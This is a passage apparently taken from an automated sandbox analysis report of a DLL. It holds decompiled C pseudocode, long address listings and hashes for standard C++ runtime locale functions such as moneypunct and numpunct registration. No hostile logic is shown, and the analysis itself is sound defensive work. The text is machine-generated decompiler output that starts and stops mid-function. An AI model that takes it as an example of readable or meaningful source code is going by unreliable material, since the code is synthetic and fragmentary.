																				if(_t530 == 0) {
																					_push( *((intOrPtr*)(_t550 + 8)));
																					_push(_t550 - 0x10);
																					__eflags = E6E2113A1(_t389, _t427, _t510, _t517, _t530) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t550 - 0x20);
																						E6E223D74(_t550 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t389, _t517, _t530, 0x14);
																						E6E206653(_t550 - 0x14, 0);
																						_t531 =  *0x6e2c6ddc; // 0x0
																						 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																						 *(_t550 - 0x10) = _t531;
																						_t259 = E6E1E161C(0x6e2c6d88);
																						_t434 =  *((intOrPtr*)(_t550 + 8));
																						_t518 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t259);
																						__eflags = _t518;
																						if(_t518 != 0) {
																							L47:
																							E6E2066BA(_t550 - 0x14);
																							return E6E220075(_t518);
																						} else {
																							__eflags = _t531;
																							if(_t531 == 0) {
																								_push( *((intOrPtr*)(_t550 + 8)));
																								_push(_t550 - 0x10);
																								__eflags = E6E211409(_t389, _t434, _t510, _t518, _t531) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t550 - 0x20);
																									E6E223D74(_t550 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t389, _t518, _t531, 0x14);
																									E6E206653(_t550 - 0x14, 0);
																									_t532 =  *0x6e2c6de0; // 0x0
																									 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																									 *(_t550 - 0x10) = _t532;
																									_t272 = E6E1E161C(0x6e2c6d8c);
																									_t441 =  *((intOrPtr*)(_t550 + 8));
																									_t519 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t272);
																									__eflags = _t519;
																									if(_t519 != 0) {
																										L54:
																										E6E2066BA(_t550 - 0x14);
																										return E6E220075(_t519);
																									} else {
																										__eflags = _t532;
																										if(_t532 == 0) {
																											_push( *((intOrPtr*)(_t550 + 8)));
																											_push(_t550 - 0x10);
																											__eflags = E6E211471(_t389, _t441, _t510, _t519, _t532) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t550 - 0x20);
																												E6E223D74(_t550 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t389, _t519, _t532, 0x14);
																												E6E206653(_t550 - 0x14, 0);
																												_t533 =  *0x6e2c6dfc; // 0x0
																												 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																												 *(_t550 - 0x10) = _t533;
																												_t285 = E6E1E161C(0x6e2c6da8);
																												_t448 =  *((intOrPtr*)(_t550 + 8));
																												_t520 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t285);
																												__eflags = _t520;
																												if(_t520 != 0) {
																													L61:
																													E6E2066BA(_t550 - 0x14);
																													return E6E220075(_t520);
																												} else {
																													__eflags = _t533;
																													if(_t533 == 0) {
																														_push( *((intOrPtr*)(_t550 + 8)));
																														_push(_t550 - 0x10);
																														__eflags = E6E2114EC(_t389, _t448, _t510, _t520, _t533) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t550 - 0x20);
																															E6E223D74(_t550 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t389, _t520, _t533, 0x14);
																															E6E206653(_t550 - 0x14, 0);
																															_t534 =  *0x6e2c6dcc; // 0x0
																															 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																															 *(_t550 - 0x10) = _t534;
																															_t298 = E6E1E161C(0x6e2c6d80);
																															_t455 =  *((intOrPtr*)(_t550 + 8));
																															_t521 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t298);
																															__eflags = _t521;
																															if(_t521 != 0) {
																																L68:
																																E6E2066BA(_t550 - 0x14);
																																return E6E220075(_t521);
																															} else {
																																__eflags = _t534;
																																if(_t534 == 0) {
																																	_push( *((intOrPtr*)(_t550 + 8)));
																																	_push(_t550 - 0x10);
																																	__eflags = E6E211558(_t389, _t455, _t510, _t521, _t534) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t550 - 0x20);
																																		E6E223D74(_t550 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t389, _t521, _t534, 0x14);
																																		E6E206653(_t550 - 0x14, 0);
																																		_t535 =  *0x6e2c6e00; // 0x0
																																		 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																																		 *(_t550 - 0x10) = _t535;
																																		_t311 = E6E1E161C(0x6e2c6dac);
																																		_t462 =  *((intOrPtr*)(_t550 + 8));
																																		_t522 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t311);
																																		__eflags = _t522;
																																		if(_t522 != 0) {
																																			L75:
																																			E6E2066BA(_t550 - 0x14);
																																			return E6E220075(_t522);
																																		} else {
																																			__eflags = _t535;
																																			if(_t535 == 0) {
																																				_push( *((intOrPtr*)(_t550 + 8)));
																																				_push(_t550 - 0x10);
																																				__eflags = E6E2115C4(_t389, _t462, _t510, _t522, _t535) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1E1438(_t550 - 0x20);
																																					E6E223D74(_t550 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e2683cf, _t389, _t522, _t535, 0x14);
																																					E6E206653(_t550 - 0x14, 0);
																																					_t536 =  *0x6e2c6dd0; // 0x0
																																					 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																																					 *(_t550 - 0x10) = _t536;
																																					_t324 = E6E1E161C(0x6e2c6d60);
																																					_t469 =  *((intOrPtr*)(_t550 + 8));
																																					_t523 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t324);
																																					__eflags = _t523;
																																					if(_t523 != 0) {
																																						L82:
																																						E6E2066BA(_t550 - 0x14);
																																						return E6E220075(_t523);
																																					} else {
																																						__eflags = _t536;
																																						if(_t536 == 0) {
																																							_push( *((intOrPtr*)(_t550 + 8)));
																																							_push(_t550 - 0x10);
																																							__eflags = E6E21162A(_t389, _t469, _t510, _t523, _t536) - 0xffffffff;
																																							if(__eflags == 0) {
																																								_t473 = _t550 - 0x20;
																																								E6E1E1438(_t473);
																																								E6E223D74(_t550 - 0x20, 0x6e2c3504);
																																								asm("int3");
																																								E6E2200AC(0x6e26851f, _t389, _t523, _t536, 4);
																																								_t537 = _t473;
																																								 *(_t550 - 0x10) = _t537;
																																								 *((intOrPtr*)(_t537 + 4)) =  *((intOrPtr*)(_t550 + 0xc));
																																								_push( *((intOrPtr*)(_t550 + 0x14)));
																																								_t175 = _t550 - 4;
																																								 *_t175 =  *(_t550 - 4) & 0x00000000;
																																								__eflags =  *_t175;
																																								 *_t537 = 0x6e26c0c4;
																																								 *((char*)(_t537 + 0x28)) =  *((intOrPtr*)(_t550 + 0x10));
																																								E6E21542F(_t389, _t473, _t510, _t523, _t537,  *_t175);
																																								return E6E220075(_t537,  *((intOrPtr*)(_t550 + 8)));
																																							} else {
																																								_t523 =  *(_t550 - 0x10);
																																								 *(_t550 - 0x10) = _t523;
																																								 *(_t550 - 4) = 1;
																																								E6E206FD3(__eflags, _t523);
																																								 *0x6e26a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t523 + 4))))();
																																								 *0x6e2c6dd0 = _t523;
																																								goto L82;
																																							}
																																						} else {
																																							_t523 = _t536;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t522 =  *(_t550 - 0x10);
																																					 *(_t550 - 0x10) = _t522;
																																					 *(_t550 - 4) = 1;
																																					E6E206FD3(__eflags, _t522);
																																					 *0x6e26a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t522 + 4))))();
																																					 *0x6e2c6e00 = _t522;
																																					goto L75;
																																				}
																																			} else {
																																				_t522 = _t535;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t521 =  *(_t550 - 0x10);
																																		 *(_t550 - 0x10) = _t521;
																																		 *(_t550 - 4) = 1;
																																		E6E206FD3(__eflags, _t521);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t521 + 4))))();
																																		 *0x6e2c6dcc = _t521;
																																		goto L68;
																																	}
																																} else {
																																	_t521 = _t534;
																																	goto L68;
																																}
																															}
																														} else {
																															_t520 =  *(_t550 - 0x10);
																															 *(_t550 - 0x10) = _t520;
																															 *(_t550 - 4) = 1;
																															E6E206FD3(__eflags, _t520);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t520 + 4))))();
																															 *0x6e2c6dfc = _t520;
																															goto L61;
																														}
																													} else {
																														_t520 = _t533;
																														goto L61;
																													}
																												}
																											} else {
																												_t519 =  *(_t550 - 0x10);
																												 *(_t550 - 0x10) = _t519;
																												 *(_t550 - 4) = 1;
																												E6E206FD3(__eflags, _t519);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t519 + 4))))();
																												 *0x6e2c6de0 = _t519;
																												goto L54;
																											}
																										} else {
																											_t519 = _t532;
																											goto L54;
																										}
																									}
																								} else {
																									_t518 =  *(_t550 - 0x10);
																									 *(_t550 - 0x10) = _t518;
																									 *(_t550 - 4) = 1;
																									E6E206FD3(__eflags, _t518);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t518 + 4))))();
																									 *0x6e2c6ddc = _t518;
																									goto L47;
																								}
																							} else {
																								_t518 = _t531;
																								goto L47;
																							}
																						}
																					} else {
																						_t517 =  *(_t550 - 0x10);
																						 *(_t550 - 0x10) = _t517;
																						 *(_t550 - 4) = 1;
																						E6E206FD3(__eflags, _t517);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t517 + 4))))();
																						 *0x6e2c6db0 = _t517;
																						goto L40;
																					}
																				} else {
																					_t517 = _t530;
																					goto L40;
																				}
																			}
																		} else {
																			_t516 =  *(_t550 - 0x10);
																			 *(_t550 - 0x10) = _t516;
																			 *(_t550 - 4) = 1;
																			E6E206FD3(__eflags, _t516);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t516 + 4))))();
																			 *0x6e2c6dd8 = _t516;
																			goto L33;
																		}
																	} else {
																		_t516 = _t529;
																		goto L33;
																	}
																}
															} else {
																_t515 =  *(_t550 - 0x10);
																 *(_t550 - 0x10) = _t515;
																 *(_t550 - 4) = 1;
																E6E206FD3(__eflags, _t515);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t515 + 4))))();
																 *0x6e2c6dc4 = _t515;
																goto L26;
															}
														} else {
															_t515 = _t528;
															goto L26;
														}
													}
												} else {
													_t514 =  *(_t550 - 0x10);
													 *(_t550 - 0x10) = _t514;
													 *(_t550 - 4) = 1;
													E6E206FD3(__eflags, _t514);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t514 + 4))))();
													 *0x6e2c6dc8 = _t514;
													goto L19;
												}
											} else {
												_t514 = _t527;
												goto L19;
											}
										}
									} else {
										_t513 =  *(_t550 - 0x10);
										 *(_t550 - 0x10) = _t513;
										 *(_t550 - 4) = 1;
										E6E206FD3(__eflags, _t513);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t513 + 4))))();
										 *0x6e2c6df4 = _t513;
										goto L12;
									}
								} else {
									_t513 = _t526;
									goto L12;
								}
							}
						} else {
							_t512 =  *(_t550 - 0x10);
							 *(_t550 - 0x10) = _t512;
							 *(_t550 - 4) = 1;
							E6E206FD3(__eflags, _t512);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t512 + 4))))();
							 *0x6e2c6df8 = _t512;
							goto L5;
						}
					} else {
						_t512 = _t525;
						goto L5;
					}
				}
			}










































                          0x6e20f567
                          0x6e20f567
                          0x6e20f56e
                          0x6e20f578
                          0x6e20f57d
                          0x6e20f588
                          0x6e20f58c
                          0x6e20f58f
                          0x6e20f594
                          0x6e20f598
                          0x6e20f59d
                          0x6e20f5a1
                          0x6e20f5e6
                          0x6e20f5e9
                          0x6e20f5f5
                          0x6e20f5a3
                          0x6e20f5a5
                          0x6e20f5ab
                          0x6e20f5b1
                          0x6e20f5b9
                          0x6e20f5bc
                          0x6e20f5f9
                          0x6e20f607
                          0x6e20f60c
                          0x6e20f614
                          0x6e20f61e
                          0x6e20f623
                          0x6e20f62e
                          0x6e20f632
                          0x6e20f635
                          0x6e20f63a
                          0x6e20f643
                          0x6e20f645
                          0x6e20f647
                          0x6e20f68c
                          0x6e20f68f
                          0x6e20f69b
                          0x6e20f649
                          0x6e20f649
                          0x6e20f64b
                          0x6e20f651
                          0x6e20f657
                          0x6e20f65f
                          0x6e20f662
                          0x6e20f69f
                          0x6e20f6ad
                          0x6e20f6b2
                          0x6e20f6ba
                          0x6e20f6c4
                          0x6e20f6c9
                          0x6e20f6d4
                          0x6e20f6d8
                          0x6e20f6db
                          0x6e20f6e0
                          0x6e20f6e9
                          0x6e20f6eb
                          0x6e20f6ed
                          0x6e20f732
                          0x6e20f735
                          0x6e20f741
                          0x6e20f6ef
                          0x6e20f6ef
                          0x6e20f6f1
                          0x6e20f6f7
                          0x6e20f6fd
                          0x6e20f705
                          0x6e20f708
                          0x6e20f745
                          0x6e20f753
                          0x6e20f758
                          0x6e20f760
                          0x6e20f76a
                          0x6e20f76f
                          0x6e20f77a
                          0x6e20f77e
                          0x6e20f781
                          0x6e20f786
                          0x6e20f78f
                          0x6e20f791
                          0x6e20f793
                          0x6e20f7d8
                          0x6e20f7db
                          0x6e20f7e7
                          0x6e20f795
                          0x6e20f795
                          0x6e20f797
                          0x6e20f79d
                          0x6e20f7a3
                          0x6e20f7ab
                          0x6e20f7ae
                          0x6e20f7eb
                          0x6e20f7f9
                          0x6e20f7fe
                          0x6e20f806
                          0x6e20f810
                          0x6e20f815
                          0x6e20f820
                          0x6e20f824
                          0x6e20f827
                          0x6e20f82c
                          0x6e20f835
                          0x6e20f837
                          0x6e20f839
                          0x6e20f87e
                          0x6e20f881
                          0x6e20f88d
                          0x6e20f83b
                          0x6e20f83b
                          0x6e20f83d
                          0x6e20f843
                          0x6e20f849
                          0x6e20f851
                          0x6e20f854
                          0x6e20f891
                          0x6e20f89f
                          0x6e20f8a4
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8db
                          0x6e20f8dd
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797
                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1
                          0x6e20f664
                          0x6e20f664
                          0x6e20f667
                          0x6e20f66b
                          0x6e20f66f
                          0x6e20f67c
                          0x6e20f684
                          0x6e20f686
                          0x00000000
                          0x6e20f686
                          0x6e20f64d
                          0x6e20f64d
                          0x00000000
                          0x6e20f64d
                          0x6e20f64b
                          0x6e20f5be
                          0x6e20f5be
                          0x6e20f5c1
                          0x6e20f5c5
                          0x6e20f5c9
                          0x6e20f5d6
                          0x6e20f5de
                          0x6e20f5e0
                          0x00000000
                          0x6e20f5e0
                          0x6e20f5a7
                          0x6e20f5a7
                          0x00000000
                          0x6e20f5a7
                          0x6e20f5a5

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F56E
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F578
                          • int.LIBCPMT ref: 6E20F58F
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • moneypunct.LIBCPMT ref: 6E20F5B2
                          • std::_Facet_Register.LIBCPMT ref: 6E20F5C9
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F5E9
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F607
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                          • String ID:
                          • API String ID: 113178234-0
                          • Opcode ID: 0d964810bfd792dfd90f7f1dbdabeb84099d0821db2dab1f33aed50f754c40d3
                          • Instruction ID: 4430a788135ba6fe5c0d3a1d7bd1b584371bfa209c41759e8d9901a041af72ae
                          • Opcode Fuzzy Hash: 0d964810bfd792dfd90f7f1dbdabeb84099d0821db2dab1f33aed50f754c40d3
                          • Instruction Fuzzy Hash: 4E11067991051E8FCF05DFE4C894AEEB77BBF94718F240918E4216B2D0DB749A84C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20A2F1, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 70%
                          			E6E20A2F1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				intOrPtr* _v12;
				void* _v16;
				char _v20;
				char _v32;
				void* _t21;
				intOrPtr* _t22;
				intOrPtr* _t44;
				void* _t52;

				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653( &_v20, 0);
				_t52 =  *0x6e2c6cd4; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t52;
				_t21 = E6E1E161C(0x6e2c6cc0);
				_t40 = _a8;
				_t22 = E6E1E171B(_a8, _t21);
				_t50 = _t22;
				if(_t22 != 0) {
					L5:
					E6E2066BA( &_v20);
					return E6E220075(_t50);
				} else {
					if(_t52 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E20AB08(__ebx, _t40, __edx, _t50, _t52) - 0xffffffff;
						if(__eflags == 0) {
							_t44 =  &_v32;
							E6E1E1438(_t44);
							E6E223D74( &_v32, 0x6e2c3504);
							asm("int3");
							_push(_t44);
							 *((intOrPtr*)(_t44 + 4)) = _a4;
							_v12 = _t44;
							 *_t44 = 0x6e26ba24;
							return _t44;
						} else {
							_t50 = _v16;
							_v16 = _t50;
							_v4 = 1;
							E6E206FD3(__eflags, _t50);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t50 + 4))))();
							 *0x6e2c6cd4 = _t50;
							goto L5;
						}
					} else {
						_t50 = _t52;
						goto L5;
					}
				}
			}












                          0x6e20a2f8
                          0x6e20a302
                          0x6e20a307
                          0x6e20a312
                          0x6e20a316
                          0x6e20a319
                          0x6e20a31e
                          0x6e20a322
                          0x6e20a327
                          0x6e20a32b
                          0x6e20a370
                          0x6e20a373
                          0x6e20a37f
                          0x6e20a32d
                          0x6e20a32f
                          0x6e20a335
                          0x6e20a33b
                          0x6e20a343
                          0x6e20a346
                          0x6e20a380
                          0x6e20a383
                          0x6e20a391
                          0x6e20a396
                          0x6e20a39a
                          0x6e20a39e
                          0x6e20a3a3
                          0x6e20a3a6
                          0x6e20a3ad
                          0x6e20a348
                          0x6e20a348
                          0x6e20a34b
                          0x6e20a34f
                          0x6e20a353
                          0x6e20a360
                          0x6e20a368
                          0x6e20a36a
                          0x00000000
                          0x6e20a36a
                          0x6e20a331
                          0x6e20a331
                          0x00000000
                          0x6e20a331
                          0x6e20a32f

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20A2F8
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20A302
                          • int.LIBCPMT ref: 6E20A319
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • numpunct.LIBCPMT ref: 6E20A33C
                          • std::_Facet_Register.LIBCPMT ref: 6E20A353
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20A373
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20A391
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
                          • String ID:
                          • API String ID: 2509942033-0
                          • Opcode ID: 4874b7eead0ef606ae9065d7341ae4be5de678551fec6b4eda4d2aeb5f8608c6
                          • Instruction ID: 7e277367ff80e61130ca7e8184fd0f73f595a43bfe6d12f322f8be67388d697a
                          • Opcode Fuzzy Hash: 4874b7eead0ef606ae9065d7341ae4be5de678551fec6b4eda4d2aeb5f8608c6
                          • Instruction Fuzzy Hash: 2A1106B591052D8FCF04DBE0C898AEDB77BAF45714F540908E5106B2D0DF74AA44C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20A059, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20A059(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v12;
				void* _v16;
				char _v20;
				intOrPtr* _v28;
				char _v32;
				void* _t77;
				intOrPtr* _t78;
				void* _t90;
				void* _t103;
				void* _t116;
				void* _t129;
				intOrPtr* _t196;
				intOrPtr* _t215;
				intOrPtr* _t216;
				intOrPtr* _t217;
				intOrPtr* _t218;
				void* _t220;
				intOrPtr* _t221;
				intOrPtr* _t222;
				intOrPtr* _t223;
				void* _t224;

				_t212 = __edx;
				_t161 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653( &_v20, 0);
				_t220 =  *0x6e2c6cd8; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t220;
